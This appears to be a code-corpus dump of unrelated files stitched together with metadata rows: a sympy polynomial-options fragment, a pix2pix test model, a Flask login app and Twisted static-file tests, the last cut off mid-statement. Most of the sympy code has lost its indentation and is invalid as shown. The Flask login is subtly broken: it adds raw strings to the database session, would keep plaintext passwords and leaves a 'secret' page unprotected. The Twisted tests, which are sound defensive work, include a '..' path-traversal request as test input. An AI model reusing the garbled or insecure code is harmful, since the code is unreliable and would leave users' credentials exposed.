excludes = ['field', 'greedy', 'split', 'gaussian', 'extension']
after = ['gens']
    _re_realfield = re.compile(r"^(R|RR)(_(\d+))?$")
    _re_complexfield = re.compile(r"^(C|CC)(_(\d+))?$")
    _re_finitefield = re.compile(r"^(FF|GF)\((\d+)\)$")
    _re_polynomial = re.compile(r"^(Z|ZZ|Q|QQ)\[(.+)\]$")
    _re_fraction = re.compile(r"^(Z|ZZ|Q|QQ)\((.+)\)$")
    _re_algebraic = re.compile(r"^(Q|QQ)\<(.+)\>$")
@classmethod
def preprocess(cls, domain):
if isinstance(domain, sympy.polys.domains.Domain):
return domain
elif hasattr(domain, 'to_domain'):
return domain.to_domain()
elif isinstance(domain, string_types):
if domain in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ
if domain in ['Q', 'QQ']:
return sympy.polys.domains.QQ
if domain == 'EX':
return sympy.polys.domains.EX
r = cls._re_realfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.RR
else:
return sympy.polys.domains.RealField(int(prec))
r = cls._re_complexfield.match(domain)
if r is not None:
_, _, prec = r.groups()
if prec is None:
return sympy.polys.domains.CC
else:
return sympy.polys.domains.ComplexField(int(prec))
r = cls._re_finitefield.match(domain)
if r is not None:
return sympy.polys.domains.FF(int(r.groups()[1]))
r = cls._re_polynomial.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.poly_ring(*gens)
else:
return sympy.polys.domains.QQ.poly_ring(*gens)
r = cls._re_fraction.match(domain)
if r is not None:
ground, gens = r.groups()
gens = list(map(sympify, gens.split(',')))
if ground in ['Z', 'ZZ']:
return sympy.polys.domains.ZZ.frac_field(*gens)
else:
return sympy.polys.domains.QQ.frac_field(*gens)
r = cls._re_algebraic.match(domain)
if r is not None:
gens = list(map(sympify, r.groups()[1].split(',')))
return sympy.polys.domains.QQ.algebraic_field(*gens)
raise OptionError('expected a valid domain specification, got %s' % domain)
@classmethod
def postprocess(cls, options):
if 'gens' in options and 'domain' in options and options['domain'].is_Composite and \
(set(options['domain'].symbols) & set(options['gens'])):
raise GeneratorsError(
"ground domain and generators interfere together")
elif ('gens' not in options or not options['gens']) and \
'domain' in options and options['domain'] == sympy.polys.domains.EX:
raise GeneratorsError("you have to provide generators because EX domain was requested")
class Split(with_metaclass(OptionType, BooleanOption)):
"""``split`` option to polynomial manipulation functions. """
option = 'split'
requires = []
excludes = ['field', 'greedy', 'domain', 'gaussian', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'split' in options:
raise NotImplementedError("'split' option is not implemented yet")
class Gaussian(with_metaclass(OptionType, BooleanOption)):
"""``gaussian`` option to polynomial manipulation functions. """
option = 'gaussian'
requires = []
excludes = ['field', 'greedy', 'domain', 'split', 'extension',
'modulus', 'symmetric']
@classmethod
def postprocess(cls, options):
if 'gaussian' in options and options['gaussian'] is True:
options['extension'] = set([S.ImaginaryUnit])
Extension.postprocess(options)
class Extension(with_metaclass(OptionType, Option)):
"""``extension`` option to polynomial manipulation functions. """
option = 'extension'
requires = []
excludes = ['greedy', 'domain', 'split', 'gaussian', 'modulus',
'symmetric']
@classmethod
def preprocess(cls, extension):
if extension == 1:
return bool(extension)
elif extension == 0:
raise OptionError("'False' is an invalid argument for 'extension'")
else:
if not hasattr(extension, '__iter__'):
extension = set([extension])
else:
if not extension:
extension = None
else:
extension = set(extension)
return extension
@classmethod
def postprocess(cls, options):
if 'extension' in options and options['extension'] is not True:
options['domain'] = sympy.polys.domains.QQ.algebraic_field(
*options['extension'])
class Modulus(with_metaclass(OptionType, Option)):
"""``modulus`` option to polynomial manipulation functions. """
option = 'modulus'
requires = []
excludes = ['greedy', 'split', 'domain', 'gaussian', 'extension']
@classmethod
def preprocess(cls, modulus):
modulus = sympify(modulus)
if modulus.is_Integer and modulus > 0:
return int(modulus)
else:
            raise OptionError(
                "'modulus' must be a positive integer, got %s" % modulus)
@classmethod
def postprocess(cls, options):
if 'modulus' in options:
modulus = options['modulus']
symmetric = options.get('symmetric', True)
options['domain'] = sympy.polys.domains.FF(modulus, symmetric)
class Symmetric(with_metaclass(OptionType, BooleanOption)):
"""``symmetric`` option to polynomial manipulation functions. """
option = 'symmetric'
requires = ['modulus']
excludes = ['greedy', 'domain', 'split', 'gaussian', 'extension']
class Strict(with_metaclass(OptionType, BooleanOption)):
"""``strict`` option to polynomial manipulation functions. """
option = 'strict'
@classmethod
def default(cls):
return True
class Auto(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` flag to polynomial manipulation functions. """
option = 'auto'
after = ['field', 'domain', 'extension', 'gaussian']
@classmethod
def default(cls):
return True
@classmethod
def postprocess(cls, options):
if ('domain' in options or 'field' in options) and 'auto' not in options:
options['auto'] = False
class Frac(with_metaclass(OptionType, BooleanOption, Flag)):
"""``auto`` option to polynomial manipulation functions. """
option = 'frac'
@classmethod
def default(cls):
return False
class Formal(with_metaclass(OptionType, BooleanOption, Flag)):
"""``formal`` flag to polynomial manipulation functions. """
option = 'formal'
@classmethod
def default(cls):
return False
class Polys(with_metaclass(OptionType, BooleanOption, Flag)):
"""``polys`` flag to polynomial manipulation functions. """
option = 'polys'
class Include(with_metaclass(OptionType, BooleanOption, Flag)):
"""``include`` flag to polynomial manipulation functions. """
option = 'include'
@classmethod
def default(cls):
return False
class All(with_metaclass(OptionType, BooleanOption, Flag)):
"""``all`` flag to polynomial manipulation functions. """
option = 'all'
@classmethod
def default(cls):
return False
class Gen(with_metaclass(OptionType, Flag)):
"""``gen`` flag to polynomial manipulation functions. """
option = 'gen'
@classmethod
def default(cls):
return 0
@classmethod
def preprocess(cls, gen):
if isinstance(gen, (Basic, int)):
return gen
else:
raise OptionError("invalid argument for 'gen' option")
class Symbols(with_metaclass(OptionType, Flag)):
"""``symbols`` flag to polynomial manipulation functions. """
option = 'symbols'
@classmethod
def default(cls):
return numbered_symbols('s', start=1)
@classmethod
def preprocess(cls, symbols):
if hasattr(symbols, '__iter__'):
return iter(symbols)
else:
raise OptionError("expected an iterator or iterable container, got %s" % symbols)
class Method(with_metaclass(OptionType, Flag)):
"""``method`` flag to polynomial manipulation functions. """
option = 'method'
@classmethod
def preprocess(cls, method):
if isinstance(method, str):
return method.lower()
else:
raise OptionError("expected a string, got %s" % method)
def build_options(gens, args=None):
"""Construct options from keyword arguments or ... options. """
if args is None:
gens, args = (), gens
if len(args) != 1 or 'opt' not in args or gens:
return Options(gens, args)
else:
return args['opt']
def allowed_flags(args, flags):
"""
Allow specified flags to be used in the given context.
Examples
========
>>> from sympy.polys.polyoptions import allowed_flags
>>> from sympy.polys.domains import ZZ
>>> allowed_flags({'domain': ZZ}, [])
>>> allowed_flags({'domain': ZZ, 'frac': True}, [])
Traceback (most recent call last):
...
FlagError: 'frac' flag is not allowed in this context
>>> allowed_flags({'domain': ZZ, 'frac': True}, ['frac'])
"""
flags = set(flags)
for arg in args.keys():
try:
if Options.__options__[arg].is_Flag and not arg in flags:
raise FlagError(
"'%s' flag is not allowed in this context" % arg)
except KeyError:
raise OptionError("'%s' is not a valid option" % arg)
def set_defaults(options, **defaults):
"""Update options with default values. """
if 'defaults' not in options:
options = dict(options)
options['defaults'] = defaults
return options
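# Illustrative sketch of set_defaults (not part of the doctests): passing
#   set_defaults({'domain': ZZ}, gens=(x, y))
# yields {'domain': ZZ, 'defaults': {'gens': (x, y)}}, while a dict that
# already has a 'defaults' key is returned unchanged.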
Options._init_dependencies_order()
| 27.249673 | 114 | 0.577905 | [
"MIT"
] | 18padx08/PPTex | PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/polys/polyoptions.py | 20,846 | Python |
from .base_model import BaseModel
from . import networks
from .cycle_gan_model import CycleGANModel
class TestModel(BaseModel):
def name(self):
return 'TestModel'
@staticmethod
def modify_commandline_options(parser, is_train=True):
assert not is_train, 'TestModel cannot be used in train mode'
parser = CycleGANModel.modify_commandline_options(parser, is_train=False)
parser.set_defaults(dataset_mode='single')
parser.add_argument('--model_suffix', type=str, default='',
help='In checkpoints_dir, [epoch]_net_G[model_suffix].pth will'
' be loaded as the generator of TestModel')
return parser
def initialize(self, opt):
assert (not opt.isTrain)
BaseModel.initialize(self, opt)
# specify the training losses you want to print out. The program will call base_model.get_current_losses
self.loss_names = []
# specify the images you want to save/display. The program will call base_model.get_current_visuals
self.visual_names = ['real_A', 'fake_B']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
self.model_names = ['G' + opt.model_suffix]
self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.norm, not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
# assigns the model to self.netG_[suffix] so that it can be loaded
# please see BaseModel.load_networks
setattr(self, 'netG' + opt.model_suffix, self.netG)
def set_input(self, input):
# we need to use single_dataset mode
self.real_A = input['A'].to(self.device)
self.image_paths = input['A_paths']
def forward(self):
self.fake_B = self.netG(self.real_A)
| 36.723404 | 128 | 0.741599 | [
"BSD-3-Clause"
] | yunyanxing/pairwise_xray_augmentation | models/test_model.py | 1,726 | Python |
from flask import Flask, render_template, url_for, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(30))
password = db.Column(db.String(30))
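# The snippet never creates the schema; a minimal sketch (assuming this module
# owns the SQLite file) so the first insert does not fail on a missing table:
with app.app_context():
    db.create_all()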
@app.route('/', methods=['POST', 'GET'])
def login():
username = request.form['username']
password = request.form['password']
db.session.add(username)
db.session.add(password)
db.session.commit()
return render_template("index.html")
@app.route('/secret')
def secret():
return render_template("secret.html")
if __name__ == "__main__":
app.run(debug=True) | 25.870968 | 62 | 0.703242 | [
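# A minimal usage sketch (an assumption, not part of the original app): with the
# server running on Flask's default local port and both templates present, the
# form can be exercised from Python with the `requests` library.
#
#   import requests
#   requests.post("http://127.0.0.1:5000/",
#                 data={"username": "alice", "password": "secret"})
#   requests.get("http://127.0.0.1:5000/secret")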
"Apache-2.0"
] | PrateekBing/fake-instagram-page | app.py | 802 | Python |
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.static}.
"""
import errno
import inspect
import mimetypes
import os
import re
import sys
import warnings
from io import BytesIO as StringIO
from unittest import skipIf
from zope.interface.verify import verifyObject
from twisted.internet import abstract, interfaces
from twisted.python.runtime import platform
from twisted.python.filepath import FilePath
from twisted.python import compat, log
from twisted.python.compat import networkString
from twisted.trial.unittest import TestCase
from twisted.web import static, http, script, resource
from twisted.web.server import UnsupportedMethod
from twisted.web.test.requesthelper import DummyRequest
from twisted.web.test._util import _render
from twisted.web._responses import FOUND
class StaticDataTests(TestCase):
"""
Tests for L{Data}.
"""
def test_headRequest(self):
"""
L{Data.render} returns an empty response body for a I{HEAD} request.
"""
data = static.Data(b"foo", "bar")
request = DummyRequest([''])
request.method = b'HEAD'
d = _render(data, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_invalidMethod(self):
"""
L{Data.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
data = static.Data(b"foo", b"bar")
request = DummyRequest([b''])
request.method = b'POST'
self.assertRaises(UnsupportedMethod, data.render, request)
class StaticFileTests(TestCase):
"""
Tests for the basic behavior of L{File}.
"""
def _render(self, resource, request):
return _render(resource, request)
def test_ignoredExtTrue(self):
"""
Passing C{1} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the
wildcard C{"*"}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=1)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_ignoredExtFalse(self):
"""
        Passing C{0} as the value to L{File}'s C{ignoredExts} argument
issues a warning and sets the ignored extensions to the empty
list.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=0)
self.assertEqual(file.ignoredExts, [])
self.assertEqual(len(caughtWarnings), 1)
def test_allowExt(self):
"""
Passing C{1} as the value to L{File}'s C{allowExt} argument
issues a warning and sets the ignored extensions to the
wildcard C{*}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=True)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_invalidMethod(self):
"""
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
request = DummyRequest([b''])
request.method = b'POST'
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
self.assertRaises(UnsupportedMethod, file.render, request)
def test_notFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'foobar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_emptyChild(self):
"""
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
self.assertIsInstance(child, static.DirectoryLister)
self.assertEqual(child.path, base.path)
def test_emptyChildUnicodeParent(self):
"""
The C{u''} child of a L{File} which corresponds to a directory
whose path is text is a L{DirectoryLister} that renders to a
binary listing.
@see: U{https://twistedmatrix.com/trac/ticket/9438}
"""
textBase = FilePath(self.mktemp()).asTextMode()
textBase.makedirs()
textBase.child(u"text-file").open('w').close()
textFile = static.File(textBase.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(textFile, request)
self.assertIsInstance(child, static.DirectoryLister)
nativePath = compat.nativeString(textBase.path)
self.assertEqual(child.path, nativePath)
response = child.render(request)
self.assertIsInstance(response, bytes)
def test_securityViolationNotFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'..'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
@skipIf(platform.isWindows(), "Cannot remove read permission on Windows")
def test_forbiddenResource(self):
"""
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
# Make sure we can delete the file later.
self.addCleanup(base.chmod, 0o700)
# Get rid of our own read permission.
base.chmod(0)
file = static.File(base.path)
request = DummyRequest([b''])
d = self._render(file, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 403)
d.addCallback(cbRendered)
return d
def test_undecodablePath(self):
"""
A request whose path cannot be decoded as UTF-8 receives a not
found response, and the failure is logged.
"""
path = self.mktemp()
if isinstance(path, bytes):
path = path.decode('ascii')
base = FilePath(path)
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b"\xff"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
self.assertEqual(len(self.flushLoggedErrors(UnicodeDecodeError)),
1)
d.addCallback(cbRendered)
return d
def test_forbiddenResource_default(self):
"""
L{File.forbidden} defaults to L{resource.ForbiddenResource}.
"""
self.assertIsInstance(
static.File(b'.').forbidden, resource.ForbiddenResource)
def test_forbiddenResource_customize(self):
"""
The resource rendered for forbidden requests is stored as a class
member so that users can customize it.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-forbidden-response'
def failingOpenForReading():
raise IOError(errno.EACCES, "")
class CustomForbiddenResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
forbidden = CustomForbiddenResource()
fileResource = CustomStaticFile(base.path)
fileResource.openForReading = failingOpenForReading
request = DummyRequest([b''])
result = fileResource.render(request)
self.assertEqual(markerResponse, result)
def test_indexNames(self):
"""
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
file.indexNames = ['foo.bar']
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
def test_staticFile(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
request = DummyRequest([b'foo.bar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
    @skipIf(sys.getfilesystemencoding().lower() not in ('utf-8', 'mbcs'),
"Cannot write unicode filenames with file system encoding of"
" {}".format(sys.getfilesystemencoding()))
def test_staticFileUnicodeFileName(self):
"""
A request for a existing unicode file path encoded as UTF-8
returns the contents of that file.
"""
name = u"\N{GREEK SMALL LETTER ETA WITH PERISPOMENI}"
content = b"content"
base = FilePath(self.mktemp())
base.makedirs()
base.child(name).setContent(content)
file = static.File(base.path)
request = DummyRequest([name.encode('utf-8')])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), content)
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
networkString(str(len(content))))
d.addCallback(cbRendered)
return d
def test_staticFileDeletedGetChild(self):
"""
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
child = staticFile.getChild(b"foo.bar", request)
self.assertEqual(child, staticFile.childNotFound)
def test_staticFileDeletedRender(self):
"""
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
request2 = DummyRequest([b'foo.bar'])
d = self._render(staticFile, request)
d2 = self._render(staticFile.childNotFound, request2)
def cbRendered2(ignored):
def cbRendered(ignored):
self.assertEqual(b''.join(request.written),
b''.join(request2.written))
d.addCallback(cbRendered)
return d
d2.addCallback(cbRendered2)
return d2
def test_getChildChildNotFound_customize(self):
"""
The resource rendered for child not found requests can be customize
using a class member.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-child-not-found-response'
class CustomChildNotFoundResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
childNotFound = CustomChildNotFoundResource()
fileResource = CustomStaticFile(base.path)
request = DummyRequest([b'no-child.txt'])
child = fileResource.getChild(b'no-child.txt', request)
result = child.render(request)
self.assertEqual(markerResponse, result)
def test_headRequest(self):
"""
L{static.File.render} returns an empty response body for I{HEAD}
requests.
"""
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
request = DummyRequest([b''])
request.method = b'HEAD'
d = _render(file, request)
def cbRendered(ignored):
self.assertEqual(b"".join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_processors(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(
b"from twisted.web.static import Data\n"
b"resource = Data(b'dynamic world', 'text/plain')\n")
file = static.File(base.path)
file.processors = {'.bar': script.ResourceScript}
request = DummyRequest([b"foo.bar"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'dynamic world')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'13')
d.addCallback(cbRendered)
return d
def test_ignoreExt(self):
"""
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
"""
file = static.File(b".")
self.assertEqual(file.ignoredExts, [])
file.ignoreExt(".foo")
file.ignoreExt(".bar")
self.assertEqual(file.ignoredExts, [".foo", ".bar"])
file = static.File(b".", ignoredExts=(".bar", ".baz"))
self.assertEqual(file.ignoredExts, [".bar", ".baz"])
def test_ignoredExtensionsIgnored(self):
"""
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('foo.bar').setContent(b'baz')
base.child('foo.quux').setContent(b'foobar')
file = static.File(base.path, ignoredExts=(".bar",))
request = DummyRequest([b"foo"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
d.addCallback(cbRendered)
return d
def test_directoryWithoutTrailingSlashRedirects(self):
"""
A request for a path which is a directory but does not have a trailing
slash will be redirected to a URL which does have a slash by L{File}.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('folder').makedirs()
file = static.File(base.path)
request = DummyRequest([b"folder"])
request.uri = b"http://dummy/folder#baz?foo=bar"
child = resource.getChildForRequest(file, request)
self.successResultOf(self._render(child, request))
self.assertEqual(request.responseCode, FOUND)
self.assertEqual(request.responseHeaders.getRawHeaders(b"location"),
[b"http://dummy/folder/#baz?foo=bar"])
def _makeFilePathWithStringIO(self):
"""
Create a L{File} that when opened for reading, returns a L{StringIO}.
@return: 2-tuple of the opened "file" and the L{File}.
@rtype: L{tuple}
"""
fakeFile = StringIO()
path = FilePath(self.mktemp())
path.touch()
file = static.File(path.path)
# Open our file instead of a real one
file.open = lambda: fakeFile
return fakeFile, file
def test_HEADClosesFile(self):
"""
A HEAD request opens the file, gets the size, and then closes it after
the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'HEAD'
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
def test_cachedRequestClosesFile(self):
"""
A GET request that is cached closes the file after the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'GET'
# This request will always return saying that it is cached
request.setLastModified = lambda _: http.CACHED
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
class StaticMakeProducerTests(TestCase):
"""
Tests for L{File.makeProducer}.
"""
def makeResourceWithContent(self, content, type=None, encoding=None):
"""
Make a L{static.File} resource that has C{content} for its content.
@param content: The L{bytes} to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
"""
fileName = FilePath(self.mktemp())
fileName.setContent(content)
resource = static.File(fileName._asBytesPath())
resource.encoding = encoding
resource.type = type
return resource
def contentHeaders(self, request):
"""
Extract the content-* headers from the L{DummyRequest} C{request}.
        This returns the subset of headers in C{request.responseHeaders} whose
        names start with 'content-'.
"""
contentHeaders = {}
for k, v in request.responseHeaders.getAllRawHeaders():
if k.lower().startswith(b'content-'):
contentHeaders[k.lower()] = v[0]
return contentHeaders
def test_noRangeHeaderGivesNoRangeStaticProducer(self):
"""
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.NoRangeStaticProducer)
def test_noRangeHeaderSets200OK(self):
"""
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(http.OK, request.responseCode)
def test_noRangeHeaderSetsContentHeaders(self):
"""
makeProducer when no Range header is set sets the Content-* headers
for the response.
"""
length = 123
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(
b'a'*length, type=contentType, encoding=contentEncoding)
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-length': b'%d' % (length,),
b'content-encoding': networkString(contentEncoding)},
self.contentHeaders(request))
def test_singleRangeGivesSingleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_singleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(b'abcdef', type=contentType, encoding=contentEncoding)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-encoding': networkString(contentEncoding),
b'content-range': b'bytes 1-3/6', b'content-length': b'3'},
self.contentHeaders(request))
def test_singleUnsatisfiableRangeReturnsSingleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleUnsatisfiableRangeSets416ReqestedRangeNotSatisfiable(self):
"""
        makeProducer sets the response code of the request to 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_singleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'0',
b'content-range': b'bytes */3'},
self.contentHeaders(request))
def test_singlePartiallyOverlappingRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=2-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'1',
b'content-range': b'bytes 2-2/3'},
self.contentHeaders(request))
def test_multipleRangeGivesMultipleRangeStaticProducer(self):
"""
        makeProducer when the Range header requests multiple byte ranges
returns an instance of MultipleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_mutipleRangeSetsContentHeaders(self):
"""
        makeProducer when the Range header requests multiple satisfiable byte
        ranges sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(
b'abcdefghijkl', encoding='gzip')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
contentHeaders = self.contentHeaders(request)
# The only content-* headers set are content-type and content-length.
self.assertEqual(
set([b'content-length', b'content-type']),
set(contentHeaders.keys()))
# The content-length depends on the boundary used in the response.
expectedLength = 5
for boundary, offset, size in producer.rangeInfo:
expectedLength += len(boundary)
self.assertEqual(b'%d' % (expectedLength,),
contentHeaders[b'content-length'])
# Content-type should be set to a value indicating a multipart
# response and the boundary used to separate the parts.
self.assertIn(b'content-type', contentHeaders)
contentType = contentHeaders[b'content-type']
self.assertNotIdentical(
None, re.match(
